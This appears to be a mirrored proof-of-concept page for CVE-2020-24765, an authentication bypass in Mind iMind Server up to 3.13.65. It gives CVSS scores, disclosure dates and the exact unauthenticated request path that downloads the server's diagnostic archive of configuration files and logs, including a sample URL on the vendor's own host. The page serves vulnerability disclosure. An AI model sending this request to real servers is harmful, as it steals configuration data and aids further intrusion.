Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-24765 PoC — Mind iMind Server 信息泄露漏洞

Source
Associated Vulnerability
Title:Mind iMind Server 信息泄露漏洞 (CVE-2020-24765)
Description:Mind iMind Server是俄罗斯mind的一个视频会议平台。 Mind iMind Server 3.13.65版本存在安全漏洞,攻击者可利用该漏洞通过 api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1请求读取自诊断档案。
Description
Authentication Bypass Vulnerability in Mind Server.
Readme
# CVE-2020-24765

Authentication Bypass Vulnerability in <a href="https://imind.ru/">Mind Server</a> version <= 3.13.65 allows any user to steal the self-diagnostic archive via a direct request.

CVSS v2: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVSS v2 Score (BS): 5

CVSS v3: (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

CVSS v3 Score (BS): 5.3


# Information

<b>Description:</b> Authentication Bypass Vulnerability allows any user to steal the self-diagnostic archive via a direct request https://PWND.SITE/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1. The archive contains copies of the main configuration files and event logs of Mind Server portal. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. 

<b>Class:</b> Design Error 

<b>Researcher:</b> Vadim Golovanov

<b>Issue date:</b> 2020-07-06 (Initial Advisory)

<b>Public release:</b> 2020-10-08

<b>Disclosure Link:</b>

<b>NIST CVE Link:</b> https://nvd.nist.gov/vuln/detail/CVE-2020-24765


# POC

<b>An example of vector:<b/> the official site of Vendor

https://vcs.imind.ru/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1

# Screenshots:

![](POC_IMIND_1.png)

![](POC_IMIND_2.png)
File Snapshot

[4.0K] /data/pocs/8d29612e1382eae12cdc4ef52e6ee9ec89437754 ├── [182K] POC_IMIND_1.png ├── [ 98K] POC_IMIND_2.png └── [1.3K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.